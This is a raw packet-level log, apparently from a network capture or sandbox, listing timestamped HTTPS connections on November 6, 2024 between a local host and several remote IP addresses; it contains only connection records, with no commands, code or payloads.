                                                                                                                                              Nov 6, 2024 16:55:38.478791952 CET44349786104.18.94.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:38.478876114 CET44349786104.18.94.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:38.478914022 CET44349786104.18.94.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:38.478921890 CET49786443192.168.2.18104.18.94.41
                                                                                                                                              Nov 6, 2024 16:55:38.478929043 CET44349786104.18.94.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:38.478981018 CET49786443192.168.2.18104.18.94.41
                                                                                                                                              Nov 6, 2024 16:55:38.478986979 CET44349786104.18.94.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:38.479700089 CET44349786104.18.94.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:38.479830027 CET49786443192.168.2.18104.18.94.41
                                                                                                                                              Nov 6, 2024 16:55:38.479836941 CET44349786104.18.94.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:38.526242018 CET49786443192.168.2.18104.18.94.41
                                                                                                                                              Nov 6, 2024 16:55:38.570347071 CET4434978735.190.80.1192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:38.570602894 CET49787443192.168.2.1835.190.80.1
                                                                                                                                              Nov 6, 2024 16:55:38.570641041 CET4434978735.190.80.1192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:38.571743011 CET4434978735.190.80.1192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:38.571815014 CET49787443192.168.2.1835.190.80.1
                                                                                                                                              Nov 6, 2024 16:55:38.572777033 CET49787443192.168.2.1835.190.80.1
                                                                                                                                              Nov 6, 2024 16:55:38.572856903 CET4434978735.190.80.1192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:38.572948933 CET49787443192.168.2.1835.190.80.1
                                                                                                                                              Nov 6, 2024 16:55:38.572958946 CET4434978735.190.80.1192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:38.600723028 CET44349786104.18.94.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:38.600830078 CET44349786104.18.94.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:38.600868940 CET44349786104.18.94.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:38.600908041 CET44349786104.18.94.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:38.600919962 CET49786443192.168.2.18104.18.94.41
                                                                                                                                              Nov 6, 2024 16:55:38.600936890 CET44349786104.18.94.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:38.600951910 CET49786443192.168.2.18104.18.94.41
                                                                                                                                              Nov 6, 2024 16:55:38.600979090 CET44349786104.18.94.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:38.601016045 CET44349786104.18.94.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:38.601030111 CET49786443192.168.2.18104.18.94.41
                                                                                                                                              Nov 6, 2024 16:55:38.601037025 CET44349786104.18.94.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:38.601068020 CET49786443192.168.2.18104.18.94.41
                                                                                                                                              Nov 6, 2024 16:55:38.601074934 CET44349786104.18.94.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:38.601125002 CET44349786104.18.94.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:38.601160049 CET44349786104.18.94.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:38.601174116 CET49786443192.168.2.18104.18.94.41
                                                                                                                                              Nov 6, 2024 16:55:38.601181030 CET44349786104.18.94.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:38.601219893 CET49786443192.168.2.18104.18.94.41
                                                                                                                                              Nov 6, 2024 16:55:38.601219893 CET49786443192.168.2.18104.18.94.41
                                                                                                                                              Nov 6, 2024 16:55:38.601614952 CET44349786104.18.94.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:38.601660967 CET49786443192.168.2.18104.18.94.41
                                                                                                                                              Nov 6, 2024 16:55:38.601667881 CET44349786104.18.94.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:38.601700068 CET49786443192.168.2.18104.18.94.41
                                                                                                                                              Nov 6, 2024 16:55:38.601905107 CET44349786104.18.94.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:38.601946115 CET49786443192.168.2.18104.18.94.41
                                                                                                                                              Nov 6, 2024 16:55:38.602246046 CET44349786104.18.94.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:38.602279902 CET44349786104.18.94.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:38.602289915 CET49786443192.168.2.18104.18.94.41
                                                                                                                                              Nov 6, 2024 16:55:38.602296114 CET44349786104.18.94.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:38.602314949 CET49786443192.168.2.18104.18.94.41
                                                                                                                                              Nov 6, 2024 16:55:38.602417946 CET44349786104.18.94.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:38.602458000 CET44349786104.18.94.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:38.602478027 CET49786443192.168.2.18104.18.94.41
                                                                                                                                              Nov 6, 2024 16:55:38.602484941 CET44349786104.18.94.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:38.602503061 CET49786443192.168.2.18104.18.94.41
                                                                                                                                              Nov 6, 2024 16:55:38.603228092 CET44349786104.18.94.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:38.603271008 CET44349786104.18.94.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:38.603285074 CET49786443192.168.2.18104.18.94.41
                                                                                                                                              Nov 6, 2024 16:55:38.603291988 CET44349786104.18.94.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:38.603321075 CET49786443192.168.2.18104.18.94.41
                                                                                                                                              Nov 6, 2024 16:55:38.622988939 CET49787443192.168.2.1835.190.80.1
                                                                                                                                              Nov 6, 2024 16:55:38.642504930 CET44349786104.18.94.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:38.642600060 CET49786443192.168.2.18104.18.94.41
                                                                                                                                              Nov 6, 2024 16:55:38.642622948 CET44349786104.18.94.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:38.642666101 CET49786443192.168.2.18104.18.94.41
                                                                                                                                              Nov 6, 2024 16:55:38.714826107 CET4434978735.190.80.1192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:38.715223074 CET49787443192.168.2.1835.190.80.1
                                                                                                                                              Nov 6, 2024 16:55:38.715298891 CET4434978735.190.80.1192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:38.715354919 CET49787443192.168.2.1835.190.80.1
                                                                                                                                              Nov 6, 2024 16:55:38.715830088 CET49788443192.168.2.1835.190.80.1
                                                                                                                                              Nov 6, 2024 16:55:38.715882063 CET4434978835.190.80.1192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:38.715960979 CET49788443192.168.2.1835.190.80.1
                                                                                                                                              Nov 6, 2024 16:55:38.716331005 CET49788443192.168.2.1835.190.80.1
                                                                                                                                              Nov 6, 2024 16:55:38.716342926 CET4434978835.190.80.1192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:38.724446058 CET44349786104.18.94.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:38.724493027 CET44349786104.18.94.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:38.724541903 CET49786443192.168.2.18104.18.94.41
                                                                                                                                              Nov 6, 2024 16:55:38.724555016 CET44349786104.18.94.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:38.724580050 CET49786443192.168.2.18104.18.94.41
                                                                                                                                              Nov 6, 2024 16:55:38.724597931 CET49786443192.168.2.18104.18.94.41
                                                                                                                                              Nov 6, 2024 16:55:38.724714994 CET44349786104.18.94.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:38.724757910 CET49786443192.168.2.18104.18.94.41
                                                                                                                                              Nov 6, 2024 16:55:38.724946022 CET44349786104.18.94.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:38.724987030 CET49786443192.168.2.18104.18.94.41
                                                                                                                                              Nov 6, 2024 16:55:38.725020885 CET44349786104.18.94.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:38.725063086 CET49786443192.168.2.18104.18.94.41
                                                                                                                                              Nov 6, 2024 16:55:38.725297928 CET44349786104.18.94.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:38.725353956 CET49786443192.168.2.18104.18.94.41
                                                                                                                                              Nov 6, 2024 16:55:38.725575924 CET44349786104.18.94.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:38.725617886 CET44349786104.18.94.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:38.725630045 CET49786443192.168.2.18104.18.94.41
                                                                                                                                              Nov 6, 2024 16:55:38.725636959 CET44349786104.18.94.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:38.725650072 CET49786443192.168.2.18104.18.94.41
                                                                                                                                              Nov 6, 2024 16:55:38.725667953 CET49786443192.168.2.18104.18.94.41
                                                                                                                                              Nov 6, 2024 16:55:38.725681067 CET44349786104.18.94.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:38.725722075 CET49786443192.168.2.18104.18.94.41
                                                                                                                                              Nov 6, 2024 16:55:38.726149082 CET44349786104.18.94.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:38.726198912 CET44349786104.18.94.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:38.726201057 CET49786443192.168.2.18104.18.94.41
                                                                                                                                              Nov 6, 2024 16:55:38.726211071 CET44349786104.18.94.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:38.726244926 CET49786443192.168.2.18104.18.94.41
                                                                                                                                              Nov 6, 2024 16:55:38.726727962 CET44349786104.18.94.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:38.726773977 CET44349786104.18.94.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:38.726778984 CET49786443192.168.2.18104.18.94.41
                                                                                                                                              Nov 6, 2024 16:55:38.726789951 CET44349786104.18.94.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:38.726814032 CET49786443192.168.2.18104.18.94.41
                                                                                                                                              Nov 6, 2024 16:55:38.726826906 CET49786443192.168.2.18104.18.94.41
                                                                                                                                              Nov 6, 2024 16:55:38.726830959 CET44349786104.18.94.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:38.726878881 CET44349786104.18.94.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:38.726912022 CET49786443192.168.2.18104.18.94.41
                                                                                                                                              Nov 6, 2024 16:55:38.727004051 CET49786443192.168.2.18104.18.94.41
                                                                                                                                              Nov 6, 2024 16:55:38.727019072 CET44349786104.18.94.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:38.730997086 CET49789443192.168.2.18104.18.95.41
                                                                                                                                              Nov 6, 2024 16:55:38.731040955 CET44349789104.18.95.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:38.731125116 CET49789443192.168.2.18104.18.95.41
                                                                                                                                              Nov 6, 2024 16:55:38.731323004 CET49789443192.168.2.18104.18.95.41
                                                                                                                                              Nov 6, 2024 16:55:38.731332064 CET44349789104.18.95.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:39.058670044 CET49790443192.168.2.18104.18.94.41
                                                                                                                                              Nov 6, 2024 16:55:39.058721066 CET44349790104.18.94.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:39.058835983 CET49790443192.168.2.18104.18.94.41
                                                                                                                                              Nov 6, 2024 16:55:39.059143066 CET49790443192.168.2.18104.18.94.41
                                                                                                                                              Nov 6, 2024 16:55:39.059163094 CET44349790104.18.94.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:39.328563929 CET4434978835.190.80.1192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:39.328919888 CET49788443192.168.2.1835.190.80.1
                                                                                                                                              Nov 6, 2024 16:55:39.328953028 CET4434978835.190.80.1192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:39.330014944 CET4434978835.190.80.1192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:39.330094099 CET49788443192.168.2.1835.190.80.1
                                                                                                                                              Nov 6, 2024 16:55:39.330380917 CET49788443192.168.2.1835.190.80.1
                                                                                                                                              Nov 6, 2024 16:55:39.330454111 CET4434978835.190.80.1192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:39.330516100 CET49788443192.168.2.1835.190.80.1
                                                                                                                                              Nov 6, 2024 16:55:39.330529928 CET4434978835.190.80.1192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:39.338097095 CET44349789104.18.95.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:39.338411093 CET49789443192.168.2.18104.18.95.41
                                                                                                                                              Nov 6, 2024 16:55:39.338429928 CET44349789104.18.95.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:39.338787079 CET44349789104.18.95.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:39.339232922 CET49789443192.168.2.18104.18.95.41
                                                                                                                                              Nov 6, 2024 16:55:39.339323997 CET44349789104.18.95.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:39.339445114 CET49789443192.168.2.18104.18.95.41
                                                                                                                                              Nov 6, 2024 16:55:39.383339882 CET44349789104.18.95.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:39.386090994 CET49788443192.168.2.1835.190.80.1
                                                                                                                                              Nov 6, 2024 16:55:39.479365110 CET44349789104.18.95.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:39.479445934 CET44349789104.18.95.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:39.479527950 CET49789443192.168.2.18104.18.95.41
                                                                                                                                              Nov 6, 2024 16:55:39.480098009 CET49789443192.168.2.18104.18.95.41
                                                                                                                                              Nov 6, 2024 16:55:39.480123997 CET44349789104.18.95.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:39.480163097 CET4434978835.190.80.1192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:39.480523109 CET49788443192.168.2.1835.190.80.1
                                                                                                                                              Nov 6, 2024 16:55:39.480593920 CET4434978835.190.80.1192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:39.480650902 CET49788443192.168.2.1835.190.80.1
                                                                                                                                              Nov 6, 2024 16:55:39.871917963 CET44349790104.18.94.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:39.872292042 CET49790443192.168.2.18104.18.94.41
                                                                                                                                              Nov 6, 2024 16:55:39.872314930 CET44349790104.18.94.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:39.872663021 CET44349790104.18.94.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:39.873032093 CET49790443192.168.2.18104.18.94.41
                                                                                                                                              Nov 6, 2024 16:55:39.873128891 CET44349790104.18.94.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:39.873222113 CET49790443192.168.2.18104.18.94.41
                                                                                                                                              Nov 6, 2024 16:55:39.919342995 CET44349790104.18.94.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:40.060396910 CET44349790104.18.94.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:40.060486078 CET44349790104.18.94.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:40.060549021 CET49790443192.168.2.18104.18.94.41
                                                                                                                                              Nov 6, 2024 16:55:40.060568094 CET44349790104.18.94.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:40.060585022 CET44349790104.18.94.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:40.060646057 CET49790443192.168.2.18104.18.94.41
                                                                                                                                              Nov 6, 2024 16:55:40.061499119 CET49790443192.168.2.18104.18.94.41
                                                                                                                                              Nov 6, 2024 16:55:40.061521053 CET44349790104.18.94.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:40.112015009 CET49791443192.168.2.18104.18.94.41
                                                                                                                                              Nov 6, 2024 16:55:40.112087965 CET44349791104.18.94.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:40.112184048 CET49791443192.168.2.18104.18.94.41
                                                                                                                                              Nov 6, 2024 16:55:40.112462044 CET49791443192.168.2.18104.18.94.41
                                                                                                                                              Nov 6, 2024 16:55:40.112482071 CET44349791104.18.94.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:40.717830896 CET44349791104.18.94.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:40.718238115 CET49791443192.168.2.18104.18.94.41
                                                                                                                                              Nov 6, 2024 16:55:40.718265057 CET44349791104.18.94.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:40.718607903 CET44349791104.18.94.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:40.718924046 CET49791443192.168.2.18104.18.94.41
                                                                                                                                              Nov 6, 2024 16:55:40.719010115 CET44349791104.18.94.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:40.719094038 CET49791443192.168.2.18104.18.94.41
                                                                                                                                              Nov 6, 2024 16:55:40.759340048 CET44349791104.18.94.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:40.860394001 CET44349791104.18.94.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:40.860476971 CET44349791104.18.94.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:40.860538960 CET49791443192.168.2.18104.18.94.41
                                                                                                                                              Nov 6, 2024 16:55:40.861181974 CET49791443192.168.2.18104.18.94.41
                                                                                                                                              Nov 6, 2024 16:55:40.861211061 CET44349791104.18.94.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:40.864094973 CET49792443192.168.2.18104.18.95.41
                                                                                                                                              Nov 6, 2024 16:55:40.864130020 CET44349792104.18.95.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:40.864192009 CET49792443192.168.2.18104.18.95.41
                                                                                                                                              Nov 6, 2024 16:55:40.864449024 CET49792443192.168.2.18104.18.95.41
                                                                                                                                              Nov 6, 2024 16:55:40.864463091 CET44349792104.18.95.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:41.453092098 CET49793443192.168.2.18104.18.94.41
                                                                                                                                              Nov 6, 2024 16:55:41.453134060 CET44349793104.18.94.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:41.453228951 CET49793443192.168.2.18104.18.94.41
                                                                                                                                              Nov 6, 2024 16:55:41.453486919 CET49793443192.168.2.18104.18.94.41
                                                                                                                                              Nov 6, 2024 16:55:41.453500032 CET44349793104.18.94.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:41.470408916 CET44349792104.18.95.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:41.470740080 CET49792443192.168.2.18104.18.95.41
                                                                                                                                              Nov 6, 2024 16:55:41.470757008 CET44349792104.18.95.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:41.471079111 CET44349792104.18.95.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:41.471373081 CET49792443192.168.2.18104.18.95.41
                                                                                                                                              Nov 6, 2024 16:55:41.471427917 CET44349792104.18.95.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:41.471496105 CET49792443192.168.2.18104.18.95.41
                                                                                                                                              Nov 6, 2024 16:55:41.519330978 CET44349792104.18.95.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:41.617084980 CET44349792104.18.95.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:41.617171049 CET44349792104.18.95.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:41.617265940 CET49792443192.168.2.18104.18.95.41
                                                                                                                                              Nov 6, 2024 16:55:41.617839098 CET49792443192.168.2.18104.18.95.41
                                                                                                                                              Nov 6, 2024 16:55:41.617861986 CET44349792104.18.95.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:42.078757048 CET44349793104.18.94.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:42.079096079 CET49793443192.168.2.18104.18.94.41
                                                                                                                                              Nov 6, 2024 16:55:42.079104900 CET44349793104.18.94.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:42.079602957 CET44349793104.18.94.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:42.079910994 CET49793443192.168.2.18104.18.94.41
                                                                                                                                              Nov 6, 2024 16:55:42.079974890 CET44349793104.18.94.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:42.080054998 CET49793443192.168.2.18104.18.94.41
                                                                                                                                              Nov 6, 2024 16:55:42.080132008 CET49793443192.168.2.18104.18.94.41
                                                                                                                                              Nov 6, 2024 16:55:42.080159903 CET44349793104.18.94.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:42.080248117 CET49793443192.168.2.18104.18.94.41
                                                                                                                                              Nov 6, 2024 16:55:42.080280066 CET44349793104.18.94.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:42.419972897 CET44349793104.18.94.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:42.420042038 CET44349793104.18.94.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:42.420074940 CET44349793104.18.94.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:42.420095921 CET49793443192.168.2.18104.18.94.41
                                                                                                                                              Nov 6, 2024 16:55:42.420106888 CET44349793104.18.94.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:42.420140982 CET44349793104.18.94.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:42.420154095 CET49793443192.168.2.18104.18.94.41
                                                                                                                                              Nov 6, 2024 16:55:42.420160055 CET44349793104.18.94.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:42.420197010 CET49793443192.168.2.18104.18.94.41
                                                                                                                                              Nov 6, 2024 16:55:42.420207024 CET44349793104.18.94.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:42.420305014 CET44349793104.18.94.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:42.420347929 CET49793443192.168.2.18104.18.94.41
                                                                                                                                              Nov 6, 2024 16:55:42.420356035 CET44349793104.18.94.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:42.461126089 CET49793443192.168.2.18104.18.94.41
                                                                                                                                              Nov 6, 2024 16:55:42.461143017 CET44349793104.18.94.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:42.508126020 CET49793443192.168.2.18104.18.94.41
                                                                                                                                              Nov 6, 2024 16:55:42.537511110 CET44349793104.18.94.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:42.537609100 CET44349793104.18.94.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:42.537668943 CET44349793104.18.94.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:42.537669897 CET49793443192.168.2.18104.18.94.41
                                                                                                                                              Nov 6, 2024 16:55:42.537678957 CET44349793104.18.94.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:42.537733078 CET49793443192.168.2.18104.18.94.41
                                                                                                                                              Nov 6, 2024 16:55:42.537739038 CET44349793104.18.94.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:42.537785053 CET44349793104.18.94.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:42.537822962 CET44349793104.18.94.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:42.537832022 CET49793443192.168.2.18104.18.94.41
                                                                                                                                              Nov 6, 2024 16:55:42.537837029 CET44349793104.18.94.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:42.537884951 CET49793443192.168.2.18104.18.94.41
                                                                                                                                              Nov 6, 2024 16:55:42.538904905 CET44349793104.18.94.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:42.538979053 CET44349793104.18.94.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:42.539041996 CET49793443192.168.2.18104.18.94.41
                                                                                                                                              Nov 6, 2024 16:55:42.539047003 CET44349793104.18.94.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:42.539060116 CET44349793104.18.94.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:42.539118052 CET49793443192.168.2.18104.18.94.41
                                                                                                                                              Nov 6, 2024 16:55:42.539155960 CET49793443192.168.2.18104.18.94.41
                                                                                                                                              Nov 6, 2024 16:55:42.539167881 CET44349793104.18.94.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:42.543504000 CET49794443192.168.2.18104.18.95.41
                                                                                                                                              Nov 6, 2024 16:55:42.543562889 CET44349794104.18.95.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:42.543669939 CET49794443192.168.2.18104.18.95.41
                                                                                                                                              Nov 6, 2024 16:55:42.543883085 CET49794443192.168.2.18104.18.95.41
                                                                                                                                              Nov 6, 2024 16:55:42.543904066 CET44349794104.18.95.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:43.200567007 CET44349794104.18.95.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:43.200946093 CET49794443192.168.2.18104.18.95.41
                                                                                                                                              Nov 6, 2024 16:55:43.200984001 CET44349794104.18.95.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:43.201340914 CET44349794104.18.95.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:43.201658010 CET49794443192.168.2.18104.18.95.41
                                                                                                                                              Nov 6, 2024 16:55:43.201741934 CET44349794104.18.95.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:43.201790094 CET49794443192.168.2.18104.18.95.41
                                                                                                                                              Nov 6, 2024 16:55:43.243334055 CET44349794104.18.95.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:43.255053997 CET49794443192.168.2.18104.18.95.41
                                                                                                                                              Nov 6, 2024 16:55:43.347125053 CET44349794104.18.95.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:43.347204924 CET44349794104.18.95.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:43.347275019 CET49794443192.168.2.18104.18.95.41
                                                                                                                                              Nov 6, 2024 16:55:43.347814083 CET49794443192.168.2.18104.18.95.41
                                                                                                                                              Nov 6, 2024 16:55:43.347848892 CET44349794104.18.95.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:45.731159925 CET49795443192.168.2.18104.18.94.41
                                                                                                                                              Nov 6, 2024 16:55:45.731209993 CET44349795104.18.94.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:45.731309891 CET49795443192.168.2.18104.18.94.41
                                                                                                                                              Nov 6, 2024 16:55:45.731728077 CET49795443192.168.2.18104.18.94.41
                                                                                                                                              Nov 6, 2024 16:55:45.731750965 CET44349795104.18.94.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:46.361490965 CET44349795104.18.94.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:46.361852884 CET49795443192.168.2.18104.18.94.41
                                                                                                                                              Nov 6, 2024 16:55:46.361865997 CET44349795104.18.94.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:46.362210989 CET44349795104.18.94.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:46.362514973 CET49795443192.168.2.18104.18.94.41
                                                                                                                                              Nov 6, 2024 16:55:46.362598896 CET44349795104.18.94.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:46.362662077 CET49795443192.168.2.18104.18.94.41
                                                                                                                                              Nov 6, 2024 16:55:46.362709999 CET49795443192.168.2.18104.18.94.41
                                                                                                                                              Nov 6, 2024 16:55:46.362740040 CET44349795104.18.94.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:46.362839937 CET49795443192.168.2.18104.18.94.41
                                                                                                                                              Nov 6, 2024 16:55:46.362869024 CET44349795104.18.94.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:46.734312057 CET44349795104.18.94.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:46.734371901 CET44349795104.18.94.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:46.734411955 CET44349795104.18.94.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:46.734441042 CET44349795104.18.94.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:46.734477997 CET49795443192.168.2.18104.18.94.41
                                                                                                                                              Nov 6, 2024 16:55:46.734477997 CET49795443192.168.2.18104.18.94.41
                                                                                                                                              Nov 6, 2024 16:55:46.734482050 CET44349795104.18.94.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:46.734497070 CET44349795104.18.94.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:46.734561920 CET44349795104.18.94.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:46.734601021 CET49795443192.168.2.18104.18.94.41
                                                                                                                                              Nov 6, 2024 16:55:46.734601021 CET49795443192.168.2.18104.18.94.41
                                                                                                                                              Nov 6, 2024 16:55:46.735244036 CET49795443192.168.2.18104.18.94.41
                                                                                                                                              Nov 6, 2024 16:55:46.735260963 CET44349795104.18.94.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:46.740209103 CET49796443192.168.2.18104.18.95.41
                                                                                                                                              Nov 6, 2024 16:55:46.740248919 CET44349796104.18.95.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:46.740334034 CET49796443192.168.2.18104.18.95.41
                                                                                                                                              Nov 6, 2024 16:55:46.740849972 CET49797443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:46.740880013 CET44349797188.114.97.3192.168.2.18
